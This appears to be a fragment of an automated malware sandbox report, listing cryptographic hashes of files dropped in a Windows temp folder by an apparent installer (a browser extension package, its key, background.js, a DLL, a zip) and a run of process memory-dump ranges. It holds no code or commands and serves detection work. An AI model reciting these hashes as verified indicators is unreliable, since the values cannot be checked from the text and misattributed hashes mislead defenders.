SHA256 fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA512 9731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj\icons\icon-128.png

MD5 d57a101cf48bd00b5297596c081ece42
SHA1 47be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256 a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA512 7110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj\js\background.js

MD5 432c4c1300ba1c077fbd681f9667a104
SHA1 33482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256 adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA512 0ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\dlls.manifest

MD5 963fb7657217be957d7d4732d892e55c
SHA1 593578a69d1044a896eb8ec2da856e94d359ef6b
SHA256 1d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512 f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\edge.zip

MD5 11a38af0ad330d95d2fb709612a44fa5
SHA1 bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA256 0d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA512 4bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\shlwapi.dll

MD5 4cac70c3fdb075424b58b220b4835c09
SHA1 651e43187c41994fd8f58f11d8011c4064388c89
SHA256 4094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512 810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963

memory/4444-343-0x0000000000080000-0x0000000000552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj.pem

MD5 9ad34d7fdf00b4ebb8c749e7ed6d1470
SHA1 d25a60b321dde2cc2dee4ab4466f5b5730bc8b5c
SHA256 420cea2f781a79e4298fe0801ba274cceb605ebf80cca32c89a76e15d70690f8
SHA512 fc300831a2dc4c9fa5926b0270e17c2e0f5e6eeac57eb424e0dc4cac3b2f2ab799393eac43dc027dcf43cfdba7bbd342dce37786e12922d24c70ea19a3ca3dad

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj.crx

MD5 fab1b24e1511a8b3d4a8a5ac05dd04c3
SHA1 6b417668f3424c1dcce5a4da6fadeeb4ac1fefae
SHA256 ee424504b89f6891df070a9647d254caa0b98513698109cd3d4494d7f5a46f1a
SHA512 647ea4a5758f7d9bc2a9b75c061240f0ba229376e90f5b286727aede140e9459eee6c5357aae3a15520dd502341b1176cdc6a6f7d30f5878ebd8880607734b29

memory/5020-367-0x0000000000400000-0x000000000072C000-memory.dmp

memory/4740-368-0x0000000000400000-0x00000000004E9000-memory.dmp

memory/4444-372-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-373-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-374-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-375-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-376-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-377-0x0000000000080000-0x0000000000552000-memory.dmp

memory/1112-379-0x0000000000080000-0x0000000000552000-memory.dmp

memory/1112-381-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-382-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-383-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-384-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-385-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-386-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-389-0x0000000000080000-0x0000000000552000-memory.dmp

memory/1556-390-0x0000000000080000-0x0000000000552000-memory.dmp

memory/1556-392-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-393-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-394-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-395-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-396-0x0000000000080000-0x0000000000552000-memory.dmp